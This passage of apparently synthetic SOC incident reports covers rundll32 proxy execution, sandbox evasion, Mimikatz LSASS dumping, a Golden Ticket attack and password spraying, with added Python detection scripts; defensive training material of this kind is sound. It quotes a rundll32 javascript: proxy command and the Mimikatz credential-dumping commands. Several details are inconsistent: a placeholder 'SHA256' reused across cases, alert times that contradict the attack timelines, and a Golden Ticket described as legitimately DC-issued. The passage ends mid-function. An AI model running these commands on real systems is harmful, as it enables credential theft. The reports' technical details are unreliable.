| 5. User Interview | Contact user | Teams, Phone | User clicked link in email; no further action |
| 6. Host Scan | Full scan for malware | CrowdStrike | No additional malware found |
Jira Incident Report
Ticket: SOC-2024-103
Summary: T1218 – Rundll32 Used as Proxy to Download Malicious Payload
Status: RESOLVED
Resolution: MALICIOUS – Execution Blocked
Priority: P2 – MEDIUM
Labels: T1218, system-binary-proxy, rundll32, squiblydoo, crowdstrike
Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Rundll32 Execution – No Command Line Arguments”.
Host: MKT-WS-078 (Marketing Department, user sjones).
Process: rundll32.exe executing JavaScript.
Time: 2024-02-20 11:30 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
11:20 – User receives email with link
11:21 – User clicks link
11:22 – Website redirects to exploit kit
11:23 – PowerShell command executed via browser
11:24 – PowerShell launches cmd.exe
11:25 – cmd.exe launches rundll32 with JavaScript
11:25 – JavaScript attempts to download payload from 185.143.221[.]89
11:25 – CrowdStrike detects and alerts
Rundll32 Technique:
Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";…
Purpose: Use trusted Windows binary to execute malicious JavaScript
Effect: Downloads and executes payload in memory (fileless)
Evasion: Bypasses application whitelisting (rundll32 is trusted)
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: Encrypted Cobalt Strike beacon
Status: Blocked by firewall (URL not reached)
User Activity:
User clicked link expecting “marketing report”
No immediate signs of compromise
3. Investigation Findings:
Timeline:
11:20 – Phishing link clicked
11:21-11:25 – Attack chain
11:25 – CrowdStrike alert
11:27 – SOC investigates
11:28 – Rundll32 process terminated
11:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Process:
– rundll32.exe with JavaScript command line
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked malicious URL at firewall and proxy.
Isolated host temporarily.
Host Remediation:
Full scan (no malware persisted).
Verified no file written to disk.
User Remediation:
Password reset.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
Rundll32 allowed to execute JavaScript (no restrictions).
No ASR rule blocking script execution via Office/trusted binaries.
6. Business Impact:
Operational Impact: Marketing workstation offline for 1 hour.
Data Exposure: None (payload blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
URL blocked.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block JavaScript or VBScript from launching downloaded executable content”.
Created alert for rundll32 with suspicious command lines.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to proxy the download of a malicious payload via JavaScript, a fileless technique. CrowdStrike detected the anomalous rundll32 execution and terminated the process before the payload could execute.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-20 12:30 EST
64. T1497 – Virtualization/Sandbox Evasion (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-SANDBOX-EVASION-1497-7842
Alert Time: 2024-02-20 15:30:15 EST
Severity: HIGH (85/100)
Source: Fortinet FortiSandbox
Rule: “Sandbox Evasion Techniques Detected – Malware Refuses to Run”
MITRE ATT&CK: T1497.001 – Virtualization/Sandbox Evasion: System Checks
Alert Details:
File Analysis Report:
File Name: invoice_7842.exe
File Size: 2.4 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to user in Finance
Submission Time: 15:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Malware performed multiple evasion checks:
Check 1: Detected VMware artifacts (presence of VMware tools) -> Exited
Check 2: Detected sandbox hostname patterns (“SANDBOX”, “ANALYSIS”) -> Exited
Check 3: Checked CPU core count (<2 cores) -> Exited
Check 4: Checked RAM size (<2GB) -> Exited
Check 5: Checked for debugging tools (IsDebuggerPresent) -> Exited
Malware exited without showing malicious behavior
After 10 minutes of no activity, sandbox forced deeper analysis
Forced execution revealed:
Decrypted payload: Cobalt Strike beacon
Connected to 185.143.221[.]89:443
Injected into legitimate process
Evasion Techniques Detected:
VMware Artifact Check: 10/10
Debugger Detection: 9/10
Resource Checks: 8/10
Overall Evasion Score: 9/10 (High)
Threat Score: 10/10 (Malicious)
Overall: 10/10 (Critical)
Additional Context:
Malware designed to evade automated analysis
Only runs on real user machines
Requires advanced sandbox bypass capabilities to analyze
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed malware with evasion techniques |
| 2. Email Investigation | Find email with attachment | Proofpoint, Exchange | Email to finance@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block URLs and IPs | Palo Alto, Cisco Umbrella | C2 IP added to blocklists |
| 6. Threat Hunting | Check for similar files | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-104
Summary: T1497 – Malware with Sandbox Evasion Techniques Detected
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1497, sandbox-evasion, virtualization, fortisandbox, malware
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Sandbox Evasion Techniques Detected – Malware Refuses to Run”.
File: invoice_7842.exe (email attachment).
Target: Finance Department.
Time: 2024-02-20 15:30 EST.
Technique: MITRE ATT&CK T1497.001 – Virtualization/Sandbox Evasion: System Checks.
2. Technical Analysis:
Attack Chain:
15:10 – Email sent from “vendor@payment-update[.]net”
15:11 – Email delivered to finance@company.com
15:12 – FortiSandbox analyzes attachment (inline)
15:15 – Analysis begins
15:16-15:25 – Malware performs evasion checks, exits
15:26 – Sandbox forces deeper analysis
15:28 – Malicious behavior triggered
15:30 – Alert triggers
15:31 – Email quarantined (before user opened)
Evasion Techniques Used:
VMware Detection: Checks for VMware tools, registry keys, processes
Sandbox Hostname Detection: Looks for “SANDBOX”, “ANALYSIS” in computer name
Resource Checks: CPU <2 cores, RAM <2GB -> assumes sandbox
Debugger Detection: IsDebuggerPresent, NtQueryInformationProcess
Timing: Sleep calls, delayed execution
True Payload:
After bypassing sandbox, decrypted Cobalt Strike beacon
C2: 185.143.221[.]89:443
Persistence via scheduled task
Capabilities: Keylogging, credential theft, file exfiltration
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.exe (masquerading as PDF)
3. Investigation Findings:
Timeline:
15:10 – Email sent
15:11 – Email delivered
15:12-15:30 – FortiSandbox analysis
15:30 – Alert triggers
15:31 – Email quarantined
15:32 – SOC investigates
15:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any files with sandbox evasion techniques.
8. Conclusion:
A sophisticated malware with multiple sandbox evasion techniques was delivered via email. FortiSandbox detected the evasion attempts and forced deeper analysis, revealing the true malicious payload. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-20 16:30 EST
65. T1003 – OS Credential Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LSASS-DUMP-1003-7842
Alert Time: 2024-02-20 10:30:45 EST
Severity: CRITICAL (98/100)
Source: CrowdStrike Falcon EDR
Rule: “LSASS Process Access – Potential Credential Dumping”
MITRE ATT&CK: T1003.001 – OS Credential Dumping: LSASS Memory
Alert Details:
Detection: Suspicious process attempting to access LSASS memory
Host: IT-WS-034 (IT Department)
User: msmith (Mike Smith – IT Admin)
Time: 10:25 EST
Process Details:
Process: C:\Temp\mimikatz.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent Process: cmd.exe (PID: 2341)
User: msmith (admin privileges)
API Calls:
OpenProcess (target: lsass.exe, PID: 568) – SUCCESS
MiniDumpWriteDump (attempt to write memory dump) – DETECTED
CreateFile (C:\Temp\lsass.dmp) – SUCCESS
WriteFile (writing dump file) – DETECTED and BLOCKED
Detection Logic:
Mimikatz.exe detected by hash (known credential dumping tool)
LSASS process access is highly anomalous for non-system processes
Memory dump creation is definitive credential dumping behavior
Process blocked before dump completion
Additional Context:
User msmith is IT admin with legitimate privileges
User reported suspicious email earlier
Account may be compromised
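LSASS handle opens of the kind described above are visible to any EDR and also in Sysmon Event ID 10 (ProcessAccess). The classifier below is an added example, not the report's, CrowdStrike's or Sysmon's code: it ranks such records by the access rights granted. SourceImage, TargetImage and GrantedAccess are the real Event 10 fields and the PROCESS_* constants are the documented Win32 access-right values; the allowlist of legitimate LSASS clients and the sample records are constructed assumptions.

```python
"""Rank Sysmon Event ID 10 (ProcessAccess) records that open a handle to lsass.exe.

Added illustration; not code from the incident report, CrowdStrike or Sysmon.
SourceImage, TargetImage and GrantedAccess are the real Event 10 field names and the
PROCESS_* constants are the documented Win32 access rights; the allowlist and the
sample records are constructed assumptions that must be baselined per estate.
"""
from __future__ import annotations

from collections import Counter

PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumption: OS components and the AV/EDR engine that legitimately open LSASS.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\lsm.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def classify_lsass_access(event: dict) -> tuple[str, str]:
    """Return (severity, reason) for one Event 10 record."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return "ignore", "target is not lsass.exe"
    src = event["SourceImage"].lower()
    granted = int(event["GrantedAccess"], 16)   # Sysmon logs the mask as hex text, e.g. 0x1010
    if src in ALLOWLIST:
        return "allow", f"baselined source {src}"
    if granted == PROCESS_ALL_ACCESS:
        return "critical", "PROCESS_ALL_ACCESS handle to LSASS from an unbaselined process"
    can_query = granted & (PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION)
    if granted & PROCESS_VM_READ and can_query:
        return "high", "memory-read plus query rights: the minimum a dump of LSASS needs"
    if granted & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
        return "high", "write or thread-creation rights: code injection into LSASS"
    if granted & PROCESS_VM_READ:
        return "medium", "memory-read right without query rights"
    return "low", "query-only handle"


# Constructed sample records; paths and masks are illustrative, not captured telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Temp\mimikatz.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Users\msmith\Downloads\tool.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1410"},
]


def summarize(events: list[dict]) -> dict[str, int]:
    """Count records per severity so the alert-worthy ones stand out."""
    return dict(Counter(classify_lsass_access(e)[0] for e in events))


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(classify_lsass_access(e), "<-", e["SourceImage"])
    print(summarize(SAMPLE_EVENTS))
```

Ranking by access mask rather than by source hash is what makes this useful after the remediation in this report: a renamed or recompiled dumping tool changes its hash but still needs memory-read plus query rights on LSASS.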
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed mimikatz execution and LSASS access |
| 2. Process Termination | Kill mimikatz process | CrowdStrike | Process terminated |
| 3. File Deletion | Delete mimikatz.exe and lsass.dmp | CrowdStrike Live Response | Files deleted |
| 4. User Verification | Contact msmith | Teams, Phone | User did not run mimikatz; account compromised |
| 5. Account Remediation | Disable account, reset password | Azure AD, AD | Account disabled; password reset |
| 6. Investigation | Determine compromise source | CrowdStrike, Phishing Logs | User clicked phishing link earlier |
Jira Incident Report
Ticket: SOC-2024-105
Summary: T1003 – Credential Dumping Attempt via Mimikatz on Admin Workstation
Status: RESOLVED
Resolution: MALICIOUS – Dumping Blocked
Priority: P1 – CRITICAL
Labels: T1003, credential-dumping, lsass, mimikatz, crowdstrike, compromised-admin
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “LSASS Process Access – Potential Credential Dumping”.
Host: IT-WS-034 (IT Department, user msmith).
Process: C:\Temp\mimikatz.exe.
Time: 2024-02-20 10:30 EST.
Technique: MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory.
2. Technical Analysis:
Attack Chain:
09:30 – User receives phishing email “IT Security Alert”
09:31 – User clicks link, enters credentials on fake login page
09:32 – Attacker logs in from IP 45.134.225[.]78
09:35 – Attacker RDPs to IT-WS-034 using msmith credentials
09:40 – Attacker downloads mimikatz to C:\Temp\
09:45 – Attacker executes mimikatz
09:46 – Mimikatz attempts to open LSASS process (success)
09:46 – Mimikatz attempts to dump LSASS memory to file
09:46 – CrowdStrike detects and blocks
09:47 – Process terminated
Mimikatz Commands Executed:
privilege::debug (enable SeDebugPrivilege)
sekurlsa::logonpasswords (dump credentials)
Dump file partially written before block
Data Exfiltrated:
Partial LSASS dump (approximately 10% written)
No credentials fully extracted before block
No network exfiltration of dump file
Account Status:
msmith had Domain Admin privileges
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
09:30 – Phishing email opened
09:31 – Credentials compromised
09:35-09:40 – Attacker RDP access
09:45 – Mimikatz executed
09:46 – LSASS access detected
09:47 – Process terminated
09:50 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Temp\mimikatz.exe (SHA256: a1b2c3d4…)
– C:\Temp\lsass.dmp (partial)
Network:
– Attacker IP: 45.134.225[.]78
Account:
– msmith (compromised)
4. Containment Actions:
Immediate Actions:
Terminated mimikatz process.
Deleted mimikatz.exe and lsass.dmp.
Disabled msmith account.
Blocked attacker IP at firewall.
Terminated all active sessions.
Account Remediation:
Reset msmith password.
Enforced MFA.
Removed from Domain Admins (excessive).
Host Remediation:
Full scan (no other malware).
Verified no persistence installed.
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had excessive privileges (Domain Admin).
RDP allowed from internet.
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Security Impact: Partial LSASS dump, but no credentials fully extracted.
Data Exposure: None confirmed.
7. Remediation & Prevention:
Completed Actions:
Credential dumping blocked.
Malicious tools removed.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented Credential Guard and LSA Protection.
Created alert for any LSASS access attempts.
8. Conclusion:
An attacker compromised an IT admin via phishing and attempted to dump credentials using Mimikatz. CrowdStrike detected the LSASS access and blocked the dump before completion. The account was secured, and no credentials were exfiltrated.
Closure Rationale: Credential dumping blocked; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-20 11:30 EST
Batch 14: Credential Access & Collection Incident Reports
66. T1558 – Steal or Forge Kerberos Tickets (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-KERBEROS-1558-7842
Alert Time: 2024-02-21 09:30:22 EST
Severity: CRITICAL (98/100)
Source: Microsoft Defender for Identity
Rule: “Suspected Golden Ticket Attack – Anomalous Kerberos Ticket”
MITRE ATT&CK: T1558.001 – Steal or Forge Kerberos Tickets: Golden Ticket
Alert Details:
Detection: Kerberos ticket with anomalous characteristics detected
Domain Controller: DC-01
Time: 09:25 EST
Ticket Details:
User: krbtgt (KRBTGT account – used for ticket granting)
Ticket Type: TGT (Ticket Granting Ticket)
Encryption Type: RC4 (older, vulnerable encryption)
Ticket Duration: 10 years (normal is 10 hours)
Ticket Issued By: DC-01 (legitimate)
Ticket Used By: Attacker workstation (192.168.45.78)
Suspicious Activity:
09:20 – TGT issued for krbtgt account (unusual – krbtgt never normally requests tickets)
09:21 – TGT used to request service tickets for multiple resources:
CIFS/DC-01 (file access)
HOST/DC-01 (remote management)
RPCSS/DC-01 (RPC services)
LDAP/DC-01 (directory access)
MSSQLSvc/SQL-SRV-01 (database access)
09:22 – Service tickets used to access resources
09:23 – Multiple privileged actions performed:
Added user to Domain Admins group
Created scheduled task on DC-01
Dumped NTDS.dit (domain database)
Detection Logic:
krbtgt ticket never requested by users (only by domain controllers)
RC4 encryption for krbtgt ticket is anomalous (modern environments use AES)
10-year ticket lifetime is impossible under normal circumstances
Pattern matches Golden Ticket attack (forged krbtgt ticket)
Additional Context:
Attacker had previously compromised domain admin credentials
Used to create Golden Ticket with 10-year validity
Ticket grants attacker ANY access to ANY resource in domain
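One way to turn the detection logic above into a check over domain-controller security logs, as an added example that is neither the report's code nor MDI's logic: correlate 4769 service-ticket requests with the successful 4768 TGT issuance that must precede them, and flag RC4 tickets, over-long lifetimes and krbtgt as a client. TargetUserName, IpAddress, TicketEncryptionType and ServiceName are the real event fields; lifetime_hours is an assumed enrichment (Windows events do not carry it, MDI derives it from the ticket), and every record is constructed, with 192.0.2.78 a documentation address standing in for the attacker host.

```python
"""Flag service-ticket requests whose TGT could not have come from a domain controller (T1558.001).

Added illustration; not code from the incident report or the logic of Microsoft Defender
for Identity. Records are constructed dicts modelled on Windows Security events 4768
(TGT issued) and 4769 (service ticket requested); TargetUserName, IpAddress,
TicketEncryptionType and ServiceName are the real field names. lifetime_hours is an
assumed enrichment standing in for what MDI derives from the ticket itself.
"""
from __future__ import annotations

from datetime import datetime, timedelta

RC4_HMAC = 0x17                      # Kerberos etype 23
MAX_TGT_LIFETIME_HOURS = 10          # default domain Kerberos policy
TGT_LOOKBACK = timedelta(hours=MAX_TGT_LIFETIME_HOURS)


def flag_forged_tgt_use(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (ticket key, reasons) for every 4769 with anomalous parameters or provenance."""
    # A genuine TGT leaves a successful 4768 for the same user and client address.
    tgt_issued: dict[tuple[str, str], list[datetime]] = {}
    for e in events:
        if e["EventID"] == 4768 and e.get("Status", "0x0") == "0x0":
            key = (e["TargetUserName"].lower(), e["IpAddress"])
            tgt_issued.setdefault(key, []).append(e["Time"])

    findings = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        user = e["TargetUserName"].lower().split("@")[0]
        reasons = []
        if int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            reasons.append("RC4 ticket where the domain issues AES")
        lifetime = e.get("lifetime_hours", 0)
        if lifetime > MAX_TGT_LIFETIME_HOURS:
            reasons.append(f"ticket lifetime {lifetime}h exceeds the {MAX_TGT_LIFETIME_HOURS}h policy maximum")
        if user == "krbtgt":
            reasons.append("krbtgt presented as the client principal")
        recent = tgt_issued.get((user, e["IpAddress"]), [])
        if not any(e["Time"] - TGT_LOOKBACK <= t <= e["Time"] for t in recent):
            reasons.append("no successful 4768 from this client within a TGT lifetime: TGT was not issued by a DC")
        if reasons:
            findings.append((f"{user}@{e['IpAddress']}->{e['ServiceName']}", reasons))
    return findings


# Constructed sample log: one legitimate user, one forged-ticket client, one log gap.
_T = datetime(2024, 2, 21, 8, 0)
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": _T, "TargetUserName": "jdoe", "IpAddress": "10.0.0.5",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "Time": _T + timedelta(hours=1, minutes=5), "TargetUserName": "jdoe@COMPANY.COM",
     "IpAddress": "10.0.0.5", "ServiceName": "CIFS/FS-01", "TicketEncryptionType": "0x12", "lifetime_hours": 10},
    {"EventID": 4769, "Time": _T + timedelta(hours=1, minutes=21), "TargetUserName": "krbtgt@COMPANY.COM",
     "IpAddress": "192.0.2.78", "ServiceName": "LDAP/DC-01", "TicketEncryptionType": "0x17", "lifetime_hours": 87600},
    {"EventID": 4769, "Time": _T + timedelta(hours=1, minutes=30), "TargetUserName": "asmith@COMPANY.COM",
     "IpAddress": "10.0.0.9", "ServiceName": "HOST/FS-02", "TicketEncryptionType": "0x12", "lifetime_hours": 10},
]

if __name__ == "__main__":
    for key, reasons in flag_forged_tgt_use(SAMPLE_EVENTS):
        print(key, reasons)
```

The third sample shows the weak point of the provenance check on its own: a 4769 with no matching 4768 is also what a collection gap or a ticket issued by a DC whose logs are not forwarded looks like, so that reason should raise severity only in combination with the RC4, lifetime or krbtgt signals, which is how the forged ticket in this incident stands out with all four.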
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed Golden Ticket attack indicators |
| 2. Immediate Action | Reset krbtgt password twice | PowerShell (Reset-DomainControllerPassword) | krbtgt password reset (invalidates all tickets) |
| 3. Domain Controller Isolation | Isolate DC-01 | CrowdStrike, Network ACLs | DC-01 quarantined |
| 4. Ticket Revocation | Force all tickets to be reissued | Group Policy, Reboots | All domain-joined machines rebooted |
| 5. Attacker Hunting | Find source of ticket usage | MDI, Splunk | Attacker IP identified (192.168.45.78 – compromised engineering host) |
| 6. Host Remediation | Isolate and clean attacker host | CrowdStrike | Engineering host isolated and cleaned |
Jira Incident Report
Ticket: SOC-2024-106
Summary: T1558 – Golden Ticket Attack Compromises Domain
Status: RESOLVED
Resolution: MALICIOUS – krbtgt Reset, Domain Secured
Priority: P1 – CRITICAL
Labels: T1558, golden-ticket, kerberos, krbtgt, mdi, domain-compromise
Components: Identity-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspected Golden Ticket Attack – Anomalous Kerberos Ticket”.
Target: Domain Controller DC-01, krbtgt account.
Time: 2024-02-21 09:30 EST.
Technique: MITRE ATT&CK T1558.001 – Steal or Forge Kerberos Tickets: Golden Ticket.
2. Technical Analysis:
Attack Chain:
02-20 14:00 – Attacker compromises domain admin account via phishing
02-20 14:30 – Attacker dumps NTDS.dit (domain database)
02-20 14:35 – Attacker extracts krbtgt hash from NTDS.dit
02-20 15:00 – Attacker uses Mimikatz to forge Golden Ticket
02-21 09:20 – Attacker uses Golden Ticket to access DC-01
02-21 09:21 – Requests service tickets for multiple resources
02-21 09:22 – Adds user to Domain Admins, creates scheduled task
02-21 09:23 – Dumps NTDS.dit again (exfiltrated)
02-21 09:25 – MDI detects anomalous ticket
Golden Ticket Details:
User: krbtgt (forged)
Encryption: RC4 (using stolen hash)
Lifetime: 10 years (bypasses normal expiration)
Privileges: Domain Admin equivalent (can access anything)
Attacker Actions with Golden Ticket:
Added user “tempadmin” to Domain Admins group
Created scheduled task “WindowsUpdate” on DC-01 (persistence)
Dumped NTDS.dit (all domain user hashes)
Accessed multiple file servers (no data exfiltration yet)
Impact:
Full domain compromise
All user hashes potentially compromised
Attacker had persistent access via Golden Ticket
3. Investigation Findings:
Timeline:
02-20 14:00 – Initial admin compromise
02-20 14:30 – krbtgt hash stolen
02-21 09:20 – Golden Ticket used
02-21 09:25 – MDI alert
02-21 09:30 – SOC investigates
02-21 09:35 – krbtgt password reset initiated
02-21 09:40 – DC-01 isolated
02-21 10:00 – All domain machines rebooted
Indicators of Compromise (IoCs):
Network:
– Attacker source IP: 192.168.45.78 (engineering host)
Tickets:
– RC4-encrypted krbtgt ticket with 10-year lifetime
Accounts:
– tempadmin (unauthorized Domain Admin)
Scheduled Tasks:
– WindowsUpdate on DC-01
4. Containment Actions:
Immediate Actions:
Reset krbtgt password twice (standard procedure for Golden Ticket).
Isolated DC-01 from network.
Disabled tempadmin account.
Removed scheduled task from DC-01.
Forced all domain machines to reboot (clear ticket cache).
Host Remediation:
Isolated engineering host (192.168.45.78).
Full forensic analysis (found Mimikatz).
Reimaged engineering host.
Domain-Wide Actions:
All user passwords reset (as precaution).
All service account passwords reset.
All domain admin passwords reset.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin accounts.
krbtgt hash allowed RC4 encryption (legacy).
No monitoring for anomalous Kerberos tickets.
6. Business Impact:
Operational Impact: Domain-wide password resets, reboots, 4 hours of disruption.
Security Impact: Full domain compromise; all user hashes potentially exfiltrated.
Financial Impact: Significant (password resets, incident response, potential breach notification).
7. Remediation & Prevention:
Completed Actions:
krbtgt password reset (twice).
All user passwords reset.
All admin accounts secured with MFA.
Attacker hosts cleaned.
Technical Controls Enhanced:
Disabled RC4 encryption for Kerberos (AES only).
Enabled MDI monitoring for anomalous tickets.
Implemented JIT (Just-In-Time) access for admins.
Deployed Credential Guard on all domain-joined machines.
8. Conclusion:
An attacker compromised a domain admin, extracted the krbtgt hash, and forged a Golden Ticket granting 10 years of domain access. MDI detected the anomalous ticket within minutes, enabling krbtgt reset and containment. All user passwords were reset as precaution.
Closure Rationale: krbtgt reset; domain secured; all passwords rotated.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-21 11:30 EST
67. T1110 – Brute Force (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-BRUTEFORCE-1110-7842
Alert Time: 2024-02-21 14:15:33 EST
Severity: HIGH (88/100)
Source: Azure AD Identity Protection
Rule: “Password Spray Attack Detected”
MITRE ATT&CK: T1110.003 – Brute Force: Password Spraying
Alert Details:
Detection: Multiple failed login attempts followed by success – password spray pattern
Time Window: 14:00 – 14:15 EST
Source IP: 185.143.221[.]89 (Bulgaria)
Attack Pattern: Password spraying across multiple accounts
Failed Attempts:
14:00:15 – user1@company.com (password: Winter2024!) – FAILED
14:00:30 – user2@company.com (password: Winter2024!) – FAILED
14:00:45 – user3@company.com (password: Winter2024!) – FAILED
14:01:00 – user4@company.com (password: Winter2024!) – FAILED
… (continuing with same password across different users)
Total Attempts: 847 in 15 minutes
Unique users targeted: 847
Same password used: “Winter2024!” (common seasonal password)
Successes: 12 accounts compromised
Failure rate: 98.6% (expected for password spray)
Compromised Accounts:
jsmith@company.com (John Smith – Sales)
kwilson@company.com (Karen Wilson – Marketing)
bturner@company.com (Brian Turner – Finance)
[9 additional accounts – see attachment]
Successful Logins:
14:12:15 – jsmith@company.com from 185.143.221[.]89
14:12:30 – kwilson@company.com from 185.143.221[.]89
14:12:45 – bturner@company.com from 185.143.221[.]89
(others followed same pattern)
Detection Logic:
High volume of failed logins from single IP
Same password used across many accounts
Pattern matches password spraying technique
Successes followed by immediate access
Threat Intelligence:
IP 185.143.221[.]89 known for credential stuffing attacks
Password “Winter2024!” is common seasonal password
Attackers likely obtained list of valid usernames
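The spray pattern described above (many distinct accounts, one or two attempts each, from one source) is straightforward to detect once sign-ins are grouped by source address and measured in distinct users per window rather than failures per account. The following is an added example, not code from the report or from Azure AD Identity Protection: it parses a constructed key=value log format (Azure AD SignInLogs or Windows 4625/4624 need their own parser, the grouping is the same), the thresholds are assumptions to tune per tenant, and 203.0.113.10 and 198.51.100.7 are documentation addresses.

```python
"""Detect password-spray sign-in patterns (T1110.003) from grouped authentication logs.

Added illustration; not code from the incident report or from Azure AD Identity Protection.
The lines are a constructed key=value format (real sources such as Azure AD SignInLogs or
Windows 4625/4624 need their own parser; the grouping logic is unchanged). Thresholds are
assumptions to tune per tenant; 203.0.113.10 and 198.51.100.7 are documentation addresses.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAILED)$")

WINDOW = timedelta(minutes=15)     # span over which distinct targeted accounts are counted
MIN_DISTINCT_USERS = 20            # assumption: many accounts from one source
MAX_FAILS_PER_USER = 2.0           # assumption: a spray tries each account once or twice


def parse(lines: list[str]) -> list[dict]:
    """Parse the constructed format into time-ordered event dicts; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "ip": m["ip"],
                           "user": m["user"], "result": m["result"]})
    return sorted(events, key=lambda e: e["ts"])


def detect_password_spray(lines: list[str]) -> dict[str, dict]:
    """Map each spraying source IP to its statistics and the accounts it signed into."""
    by_ip: dict[str, list[dict]] = defaultdict(list)
    for e in parse(lines):
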